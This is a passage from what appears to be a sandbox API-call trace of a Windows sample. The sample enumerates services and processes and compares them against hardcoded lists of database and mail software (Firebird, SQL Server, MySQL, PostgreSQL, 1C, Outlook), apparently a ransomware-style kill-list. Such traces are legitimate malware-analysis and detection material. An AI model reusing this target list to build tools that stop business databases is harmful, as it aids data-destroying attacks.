(lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1 [0274.654] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1 [0274.654] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1 [0274.654] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1 [0274.654] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1 [0274.654] lstrlenW (lpString="Dhcp") returned 4 [0274.654] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1 [0274.654] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1 [0274.654] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1 [0274.654] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1 [0274.654] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1 [0274.654] lstrlenW (lpString="Dnscache") returned 8 [0274.654] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1 [0274.654] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1 [0274.654] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1 [0274.654] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1 [0274.654] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1 [0274.654] lstrlenW (lpString="DPS") returned 3 [0274.654] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DPS") returned 1 [0274.654] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DPS") returned 1 [0274.654] lstrcmpiW (lpString1="sqlwriter", lpString2="DPS") returned 1 [0274.655] lstrcmpiW (lpString1="mssqlserver", lpString2="DPS") returned 1 [0274.655] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DPS") returned 1 [0274.655] lstrlenW (lpString="eventlog") returned 8 [0274.655] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="eventlog") returned 1 [0274.655] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="eventlog") returned 1 [0274.655] lstrcmpiW (lpString1="sqlwriter", lpString2="eventlog") returned 1 [0274.655] lstrcmpiW (lpString1="mssqlserver", lpString2="eventlog") returned 1 [0274.655] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="eventlog") returned 1 [0274.655] lstrlenW (lpString="EventSystem") returned 11 [0274.655] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1 [0274.655] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1 [0274.655] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1 [0274.655] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1 [0274.655] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1 [0274.655] lstrlenW (lpString="gpsvc") returned 5 [0274.655] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1 [0274.655] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1 [0274.655] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1 [0274.655] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1 [0274.655] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1 [0274.655] lstrlenW (lpString="LanmanWorkstation") returned 17 [0274.655] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0274.655] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0274.655] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanWorkstation") returned 1 [0274.655] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanWorkstation") returned 1 [0274.655] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanWorkstation") returned 1 [0274.655] lstrlenW (lpString="lmhosts") returned 7 [0274.655] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1 [0274.655] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1 [0274.655] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1 [0274.655] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1 [0274.655] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1 [0274.655] lstrlenW (lpString="MMCSS") returned 5 [0274.656] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MMCSS") returned -1 [0274.656] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MMCSS") returned -1 [0274.656] lstrcmpiW (lpString1="sqlwriter", lpString2="MMCSS") returned 1 [0274.656] lstrcmpiW (lpString1="mssqlserver", lpString2="MMCSS") returned 1 [0274.656] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MMCSS") returned 1 [0274.656] lstrlenW (lpString="MpsSvc") returned 6 [0274.656] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1 [0274.656] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1 [0274.656] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1 [0274.656] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1 [0274.656] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1 [0274.656] lstrlenW (lpString="NlaSvc") returned 6 [0274.656] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NlaSvc") returned -1 [0274.656] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NlaSvc") returned -1 [0274.656] lstrcmpiW (lpString1="sqlwriter", lpString2="NlaSvc") returned 1 [0274.656] lstrcmpiW (lpString1="mssqlserver", lpString2="NlaSvc") returned -1 [0274.656] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NlaSvc") returned 1 [0274.656] lstrlenW (lpString="nsi") returned 3 [0274.656] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1 [0274.656] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1 [0274.656] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1 [0274.656] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1 [0274.656] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1 [0274.656] lstrlenW (lpString="PcaSvc") returned 6 [0274.656] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PcaSvc") returned -1 [0274.656] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PcaSvc") returned -1 [0274.656] lstrcmpiW (lpString1="sqlwriter", lpString2="PcaSvc") returned 1 [0274.656] lstrcmpiW (lpString1="mssqlserver", lpString2="PcaSvc") returned -1 [0274.656] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PcaSvc") returned 1 [0274.656] lstrlenW (lpString="PlugPlay") returned 8 [0274.656] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1 [0274.656] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1 [0274.656] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1 [0274.656] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1 [0274.657] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1 [0274.657] lstrlenW (lpString="Power") returned 5 [0274.657] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1 [0274.657] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1 [0274.657] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1 [0274.657] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1 [0274.657] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1 [0274.657] lstrlenW (lpString="ProfSvc") returned 7 [0274.657] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1 [0274.657] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1 [0274.657] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1 [0274.657] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1 [0274.657] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1 [0274.657] lstrlenW (lpString="RpcEptMapper") returned 12 [0274.657] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1 [0274.657] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1 [0274.657] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1 [0274.657] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1 [0274.657] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1 [0274.657] lstrlenW (lpString="RpcSs") returned 5 [0274.657] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1 [0274.657] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1 [0274.657] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1 [0274.657] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1 [0274.657] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1 [0274.657] lstrlenW (lpString="SamSs") returned 5 [0274.657] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1 [0274.657] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1 [0274.657] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1 [0274.657] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1 [0274.657] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1 [0274.657] lstrlenW (lpString="Schedule") returned 8 [0274.657] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1 [0274.657] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1 [0274.658] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1 [0274.658] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1 [0274.658] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1 [0274.658] lstrlenW (lpString="SENS") returned 4 [0274.658] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1 [0274.658] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1 [0274.658] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1 [0274.658] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1 [0274.658] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1 [0274.658] lstrlenW (lpString="ShellHWDetection") returned 16 [0274.658] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1 [0274.658] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1 [0274.658] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1 [0274.658] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1 [0274.658] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1 [0274.658] lstrlenW (lpString="Spooler") returned 7 [0274.658] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1 [0274.658] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1 [0274.658] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1 [0274.658] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1 [0274.658] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1 [0274.658] lstrlenW (lpString="Themes") returned 6 [0274.658] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Themes") returned -1 [0274.658] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Themes") returned -1 [0274.658] lstrcmpiW (lpString1="sqlwriter", lpString2="Themes") returned -1 [0274.658] lstrcmpiW (lpString1="mssqlserver", lpString2="Themes") returned -1 [0274.658] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Themes") returned -1 [0274.658] lstrlenW (lpString="UxSms") returned 5 [0274.658] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="UxSms") returned -1 [0274.658] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="UxSms") returned -1 [0274.658] lstrcmpiW (lpString1="sqlwriter", lpString2="UxSms") returned -1 [0274.658] lstrcmpiW (lpString1="mssqlserver", lpString2="UxSms") returned -1 [0274.658] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="UxSms") returned -1 [0274.658] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4262fb8 | out: hHeap=0x4a0000) returned 1 [0274.658] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x388 [0274.662] Process32FirstW (in: hSnapshot=0x388, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0274.662] Process32NextW (in: hSnapshot=0x388, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4a, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0274.662] lstrlenW (lpString="System") returned 6 [0274.662] lstrcmpiW (lpString1="1c8.exe", lpString2="System") returned -1 [0274.662] lstrcmpiW (lpString1="1cv77.exe", lpString2="System") returned -1 [0274.662] lstrcmpiW (lpString1="outlook.exe", lpString2="System") returned -1 [0274.662] lstrcmpiW (lpString1="postgres.exe", lpString2="System") returned -1 [0274.662] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="System") returned -1 [0274.662] lstrcmpiW (lpString1="mysqld.exe", lpString2="System") returned -1 [0274.662] lstrcmpiW (lpString1="sqlservr.exe", lpString2="System") returned -1 [0274.663] Process32NextW (in: hSnapshot=0x388, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0274.663] lstrlenW (lpString="smss.exe") returned 8 [0274.663] lstrcmpiW (lpString1="1c8.exe", lpString2="smss.exe") returned -1 [0274.663] lstrcmpiW (lpString1="1cv77.exe", lpString2="smss.exe") returned -1 [0274.663] lstrcmpiW (lpString1="outlook.exe", lpString2="smss.exe") returned -1 [0274.663] lstrcmpiW (lpString1="postgres.exe", lpString2="smss.exe") returned -1 [0274.663] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="smss.exe") returned -1 [0274.663] lstrcmpiW (lpString1="mysqld.exe", lpString2="smss.exe") returned -1 [0274.663] lstrcmpiW (lpString1="sqlservr.exe", lpString2="smss.exe") returned 1 [0274.663] Process32NextW (in: hSnapshot=0x388, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x13c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0274.663] lstrlenW (lpString="csrss.exe") returned 9 [0274.663] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1 [0274.663] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1 [0274.663] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1 [0274.663] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1 [0274.663] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1 [0274.664] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1 [0274.664] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1 [0274.664] Process32NextW (in: hSnapshot=0x388, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x13c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0274.664] lstrlenW (lpString="wininit.exe") returned 11 [0274.664] lstrcmpiW (lpString1="1c8.exe", lpString2="wininit.exe") returned -1 [0274.664] lstrcmpiW (lpString1="1cv77.exe", lpString2="wininit.exe") returned -1 [0274.664] lstrcmpiW (lpString1="outlook.exe", lpString2="wininit.exe") returned -1 [0274.664] lstrcmpiW (lpString1="postgres.exe", lpString2="wininit.exe") returned -1 [0274.664] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="wininit.exe") returned -1 [0274.664] lstrcmpiW (lpString1="mysqld.exe", lpString2="wininit.exe") returned -1 [0274.664] lstrcmpiW (lpString1="sqlservr.exe", lpString2="wininit.exe") returned -1 [0274.664] Process32NextW (in: hSnapshot=0x388, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x16c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0274.664] lstrlenW (lpString="csrss.exe") returned 9 [0274.664] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1 [0274.664] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1 [0274.664] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1 [0274.664] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1 [0274.665] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1 [0274.665] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1 [0274.665] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1 [0274.665] Process32NextW (in: hSnapshot=0x388, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x16c, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0274.665] lstrlenW (lpString="winlogon.exe") returned 12 [0274.665] lstrcmpiW (lpString1="1c8.exe", lpString2="winlogon.exe") returned -1 [0274.665] lstrcmpiW (lpString1="1cv77.exe", lpString2="winlogon.exe") returned -1 [0274.665] lstrcmpiW (lpString1="outlook.exe", lpString2="winlogon.exe") returned -1 [0274.665] lstrcmpiW (lpString1="postgres.exe", lpString2="winlogon.exe") returned -1 [0274.665] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="winlogon.exe") returned -1 [0274.665] lstrcmpiW (lpString1="mysqld.exe", lpString2="winlogon.exe") returned -1 [0274.665] lstrcmpiW (lpString1="sqlservr.exe", lpString2="winlogon.exe") returned -1 [0274.665] Process32NextW (in: hSnapshot=0x388, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0274.665] lstrlenW (lpString="services.exe") returned 12 [0274.665] lstrcmpiW (lpString1="1c8.exe", lpString2="services.exe") returned -1 [0274.665] lstrcmpiW (lpString1="1cv77.exe", lpString2="services.exe") returned -1 [0274.665] lstrcmpiW (lpString1="outlook.exe", lpString2="services.exe") returned -1 [0274.665] lstrcmpiW (lpString1="postgres.exe", lpString2="services.exe") returned -1 [0274.666] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="services.exe") returned -1 [0274.666] lstrcmpiW (lpString1="mysqld.exe", lpString2="services.exe") returned -1 [0274.666] lstrcmpiW (lpString1="sqlservr.exe", lpString2="services.exe") returned 1 [0274.666] Process32NextW (in: hSnapshot=0x388, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0274.666] lstrlenW (lpString="lsass.exe") returned 9 [0274.666] lstrcmpiW (lpString1="1c8.exe", lpString2="lsass.exe") returned -1 [0274.666] lstrcmpiW (lpString1="1cv77.exe", lpString2="lsass.exe") returned -1 [0274.666] lstrcmpiW (lpString1="outlook.exe", lpString2="lsass.exe") returned 1 [0274.666] lstrcmpiW (lpString1="postgres.exe", lpString2="lsass.exe") returned 1 [0274.666] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="lsass.exe") returned 1 [0274.666] lstrcmpiW (lpString1="mysqld.exe", lpString2="lsass.exe") returned 1 [0274.666] lstrcmpiW (lpString1="sqlservr.exe", lpString2="lsass.exe") returned 1 [0274.666] Process32NextW (in: hSnapshot=0x388, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0274.666] lstrlenW (lpString="lsm.exe") returned 7 [0274.666] lstrcmpiW (lpString1="1c8.exe", lpString2="lsm.exe") returned -1 [0274.666] lstrcmpiW (lpString1="1cv77.exe", lpString2="lsm.exe") returned -1 [0274.666] lstrcmpiW (lpString1="outlook.exe", lpString2="lsm.exe") returned 1 [0274.666] lstrcmpiW (lpString1="postgres.exe", lpString2="lsm.exe") returned 1 [0274.667] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="lsm.exe") returned 1 [0274.667] lstrcmpiW (lpString1="mysqld.exe", lpString2="lsm.exe") returned 1 [0274.667] lstrcmpiW (lpString1="sqlservr.exe", lpString2="lsm.exe") returned 1 [0274.667] Process32NextW (in: hSnapshot=0x388, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0274.667] lstrlenW (lpString="svchost.exe") returned 11 [0274.667] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0274.667] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 [0274.667] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1 [0274.667] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1 [0274.667] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1 [0274.667] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1 [0274.667] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1 [0274.667] Process32NextW (in: hSnapshot=0x388, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0274.667] lstrlenW (lpString="svchost.exe") returned 11 [0274.667] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0274.667] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 [0274.668] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1 [0274.668] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1 [0274.668] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1 [0274.668] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1 [0274.668] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1 [0274.668] Process32NextW (in: hSnapshot=0x388, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0274.668] lstrlenW (lpString="svchost.exe") returned 11 [0274.668] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0274.668] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 [0274.668] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1 [0274.668] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1 [0274.668] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1 [0274.669] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1 [0274.669] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1 [0274.669] Process32NextW (in: hSnapshot=0x388, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x338, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0274.669] lstrlenW (lpString="svchost.exe") returned 11 [0274.669] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0274.669] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 [0274.669] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1 [0274.669] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1 [0274.669] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1 [0274.669] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1 [0274.669] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1 [0274.669] Process32NextW (in: hSnapshot=0x388, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x370, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0274.669] lstrlenW (lpString="svchost.exe") returned 11 [0274.669] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0274.669] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 [0274.669] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1 [0274.670] Process32NextW (in: hSnapshot=0x388, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0274.670] lstrlenW (lpString="audiodg.exe") returned 11 [0274.670] Process32NextW (in: hSnapshot=0x388, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0274.670] lstrlenW (lpString="svchost.exe") returned 11 [0274.670] Process32NextW (in: hSnapshot=0x388, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x378, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x1ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="userinit.exe")) returned 1 [0274.671] lstrlenW (lpString="userinit.exe") returned 12 [0274.671] Process32NextW (in: hSnapshot=0x388, lppe=0x20efd34 | out: lppe=0x20efd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x378, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0274.671] lstrlenW 